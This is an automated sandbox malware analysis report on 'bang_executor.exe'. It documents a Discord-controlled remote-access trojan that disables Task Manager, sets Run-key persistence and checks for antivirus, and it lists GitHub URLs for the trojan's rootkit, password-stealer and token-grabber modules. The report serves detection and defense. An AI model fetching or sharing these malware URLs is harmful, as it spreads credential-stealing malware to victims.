          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_0050037C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004ED076 GetVersionExW,0_2_004ED076
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Contains functionality to disable the Task Manager (.Net Source)
          Source: bang_executor.exe.0.dr, Program.cs.Net Code: DisableTaskManager
          Disable Task Manager(disabletaskmgr)
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
          Disables the Windows task manager (taskmgr)
          Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior
          Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.25.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.25.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.25.drBinary or memory string: MsMpEng.exe
          Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
          Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected Dicrord Rat
          Source: Yara matchFile source: 3.0.bang_executor.exe.230771e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: bang_executor.exe PID: 1236, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, type: DROPPED

          Remote Access Functionality

          barindex
          Yara detected Dicrord Rat
          Source: Yara matchFile source: 3.0.bang_executor.exe.230771e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: bang_executor.exe PID: 1236, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, type: DROPPED

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		1
          Scripting          		1
          DLL Side-Loading          		71
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Native API          		1
          DLL Side-Loading          		11
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop ProtocolData from Removable Media11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts212
          Command and Scripting Interpreter          		1
          Registry Run Keys / Startup Folder          		1
          Registry Run Keys / Startup Folder          		2
          Obfuscated Files or Information          		Security Account Manager36
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          PowerShell          		Login HookLogin Hook11
          Software Packing          		NTDS1
          Query Registry          		Distributed Component Object ModelInput Capture4
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Timestomp          		LSA Secrets151
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials1
          Process Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          File Deletion          		DCSync41
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Modify Registry          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
          Process Injection          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1393035 Sample: bang_executor.exe Startdate: 15/02/2024 Architecture: WINDOWS Score: 100 70 gateway.discord.gg 2->70 76 Antivirus detection for URL or domain 2->76 78 Yara detected Dicrord Rat 2->78 80 .NET source code contains potential unpacker 2->80 82 6 other signatures 2->82 11 bang_executor.exe 15 2->11         started        14 bang_executor.exe 2->14         started        signatures3 process4 file5 66 C:\Users\user\AppData\Local\...\executer.exe, PE32 11->66 dropped 68 C:\Users\user\AppData\...\bang_executor.exe, PE32+ 11->68 dropped 16 cmd.exe 1 11->16         started        19 WerFault.exe 14->19         started        process6 signatures7 74 Uses cmd line tools excessively to alter registry or file data 16->74 21 executer.exe 3 16->21         started        24 cmd.exe 1 16->24         started        26 cmd.exe 1 16->26         started        28 3 other processes 16->28 process8 dnsIp9 84 Multi AV Scanner detection for dropped file 21->84 86 Very long command line found 21->86 88 Machine Learning detection for dropped file 21->88 92 4 other signatures 21->92 31 cmd.exe 2 21->31         started        34 cmd.exe 1 21->34         started        36 conhost.exe 21->36         started        90 Uses cmd line tools excessively to alter registry or file data 24->90 38 reg.exe 1 1 24->38         started        40 conhost.exe 24->40         started        42 reg.exe 1 1 26->42         started        46 2 other processes 26->46 72 gateway.discord.gg 162.159.136.234, 443, 49729, 49730 CLOUDFLARENETUS United States 28->72 44 bang_executor.exe 2 28->44         started        48 3 other processes 28->48 signatures10 process11 signatures12 94 Bypasses PowerShell execution policy 31->94 50 conhost.exe 31->50         started        52 powershell.exe 34->52         started        54 conhost.exe 34->54         started        56 conhost.exe 34->56         started        96 Disable Task Manager(disabletaskmgr) 38->96 98 Disables the Windows task manager (taskmgr) 38->98 58 bang_executor.exe 42->58         started        60 WerFault.exe 44->60         started        process13 process14 62 WmiPrvSE.exe 52->62         started        64 WerFault.exe 58->64         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          bang_executor.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe48%ReversingLabsWin32.Trojan.Barys

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://crl.microsoft0%URL Reputationsafe
          http://crl.micros0%URL Reputationsafe
          https://geolocation-db.com/json0%Avira URL Cloudsafe
          https://discord.com/api/v9/channels/0%Avira URL Cloudsafe
          https://discord.com/api/v9/guilds/0%Avira URL Cloudsafe
          https://gateway.discord.gg/?v=9&encording=json0%Avira URL Cloudsafe
          https://gateway.discord.gg/?v=9&encording=jsonX0%Avira URL Cloudsafe
          http://gateway.discord.gg0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d100%Avira URL Cloudmalware
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll100%Avira URL Cloudmalware
          https://gateway.discord.gg:443/?v=9&encording=json0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte100%Avira URL Cloudmalware
          https://gateway.discord.gg0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll100%Avira URL Cloudmalware
          https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          gateway.discord.gg
          		162.159.136.234
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://gateway.discord.gg/?v=9&encording=jsonfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://geolocation-db.com/jsonbang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.drfalse
            • Avira URL Cloud: safe
            		unknown
            https://file.io/bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.drfalse
              		high
              https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStebang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drfalse
              • Avira URL Cloud: malware
              		unknown
              https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dllbang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drfalse
              • Avira URL Cloud: malware
              		unknown
              http://crl.microsoftbang_executor.exe, 0000001C.00000002.1780864823.000001352625A000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B598000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.dbang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drfalse
              • Avira URL Cloud: malware
              		unknown
              https://gateway.discord.gg:443/?v=9&encording=jsonbang_executor.exe, 00000003.00000002.1775906377.0000023000045000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6A5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AF5000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://upx.sf.netAmcache.hve.25.drfalse
                		high
                http://gateway.discord.ggbang_executor.exe, 00000003.00000002.1775906377.00000230000B5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87F05000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D715000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B65000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://gateway.discord.ggbang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dllbang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drfalse
                • Avira URL Cloud: malware
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebang_executor.exe, 00000003.00000002.1775906377.0000023000045000.00000004.00000800.00020000.00000000.sdmp, executer.exe, 00000004.00000002.1629460687.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6A5000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AF5000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://discord.com/api/v9/channels/bang_executor.exe.0.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://gateway.discord.gg/?v=9&encording=jsonXbang_executor.exe, 00000003.00000002.1775906377.0000023000093000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87EE3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D6F3000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62B43000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://discord.com/api/v9/guilds/bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20grabang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe, 00000003.00000002.1775906377.0000023000001000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000013.00000002.1766442944.0000023B87E51000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780195704.000001350D661000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1822457792.0000021D62AB1000.00000004.00000800.00020000.00000000.sdmp, bang_executor.exe.0.drfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://crl.microsbang_executor.exe, 00000020.00000002.1823246822.0000021D7B598000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.google.com/maps/place/bang_executor.exe, 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, bang_executor.exe.0.drfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    162.159.136.234
                    		gateway.discord.ggUnited States
                    		13335CLOUDFLARENETUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1393035
                    Start date and time:2024-02-15 18:14:04 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 47s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:38
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:bang_executor.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@45/30@1/1
                    EGA Information:
                    • Successful, ratio: 16.7%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 166
                    • Number of non-executed functions: 96
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 52.168.117.173
                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target bang_executor.exe, PID 1236 because it is empty
                    • Execution Graph export aborted for target bang_executor.exe, PID 7356 because it is empty
                    • Execution Graph export aborted for target bang_executor.exe, PID 7572 because it is empty
                    • Execution Graph export aborted for target bang_executor.exe, PID 7968 because it is empty
                    • Execution Graph export aborted for target executer.exe, PID 2228 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: bang_executor.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    17:14:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bang_executor C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                    17:14:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bang_executor C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe
                    18:14:50API Interceptor1x Sleep call for process: bang_executor.exe modified
                    18:14:52API Interceptor22x Sleep call for process: powershell.exe modified
                    18:15:04API Interceptor4x Sleep call for process: WerFault.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    162.159.136.234noway-2D8EB.exeGet hashmaliciousDicrord RatBrowse
                      SecuriteInfo.com.Exploit.Shell.29354.24275.exeGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Exploit.Shell.29354.24275.exeGet hashmaliciousUnknownBrowse
                          1EdVSOmvh0.exeGet hashmaliciousDicrord RatBrowse
                            YEM2yTzOK9.exeGet hashmaliciousDicrord RatBrowse
                              https://pub-6fbff04eeb6c444fa79c22c8c01d96e2.r2.dev/loginonlinemicrosoffice.htmlGet hashmaliciousUnknownBrowse
                                http://binaecn.comGet hashmaliciousUnknownBrowse
                                  XQDo1PTnRJ.exeGet hashmaliciousUnknownBrowse
                                    downloader.exeGet hashmaliciousDiscord Token StealerBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      gateway.discord.ggLLR SETUP OP.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                      • 162.159.134.234
                                      noway-2D8EB.exeGet hashmaliciousDicrord RatBrowse
                                      • 162.159.136.234
                                      noway-2D8EB.exeGet hashmaliciousDicrord RatBrowse
                                      • 162.159.133.234
                                      aBtQ4Tt70g.exeGet hashmaliciousDicrord RatBrowse
                                      • 162.159.133.234
                                      aBtQ4Tt70g.exeGet hashmaliciousDicrord RatBrowse
                                      • 162.159.135.234
                                      SecuriteInfo.com.Python.Agent-LZ.20719.17498.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                      • 162.159.135.234
                                      tools.exeGet hashmaliciousDicrord RatBrowse
                                      • 162.159.134.234
                                      tools.exeGet hashmaliciousDicrord RatBrowse
                                      • 162.159.134.234
                                      iostream.exeGet hashmaliciousBinder HackTool, Blank Grabber, Dicrord Rat, QuasarBrowse
                                      • 162.159.135.234
                                      Free_Nitro.exeGet hashmaliciousPython Stealer, Blank Grabber, Discord Token StealerBrowse
                                      • 162.159.134.234

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUShttps://firrifm.com/MzkxaDz6MDkxTzd1OFU=Get hashmaliciousUnknownBrowse
                                      • 1.1.1.1
                                      https://get.clipclip.com/ClipClipSetup.exeGet hashmaliciousUnknownBrowse
                                      • 172.67.69.95
                                      https://kiddushes.com/0/0/0/8e76d9aee5809553ad6668c7bfbfd114/oth23Get hashmaliciousPhisherBrowse
                                      • 104.21.80.104
                                      AntiDOT.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.154.29
                                      1.exeGet hashmaliciousLummaC, RemcosBrowse
                                      • 104.21.4.139
                                      http://yg5sjx5kzy.comGet hashmaliciousUnknownBrowse
                                      • 104.19.219.90
                                      http://yg5sjx5kzy.comGet hashmaliciousUnknownBrowse
                                      • 104.19.218.90
                                      PO20152024.scr.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 104.26.13.205
                                      New Order PO# 2047576-PR1936569,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      • 104.21.57.121
                                      International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                      • 172.67.190.93

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      3b5074b1b5d032e5620f69f9f700ff0ePO20152024.scr.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      • 162.159.136.234
                                      CV Mariana Alvarez.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 162.159.136.234
                                      mwcPF1EpU6.exeGet hashmaliciousDCRatBrowse
                                      • 162.159.136.234
                                      rProdutos_Digitalizados.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 162.159.136.234
                                      rFxu4PWpaCC68iKa.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 162.159.136.234
                                      INV2024020090.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 162.159.136.234
                                      Boyle and Summers document 2024 (4).xlsGet hashmaliciousHTMLPhisherBrowse
                                      • 162.159.136.234
                                      Omvpbu.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 162.159.136.234
                                      Abotihy.exeGet hashmaliciousPhemedrone StealerBrowse
                                      • 162.159.136.234
                                      BUNQ00009082342624.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 162.159.136.234

                                      Dropped Files

                                      No context

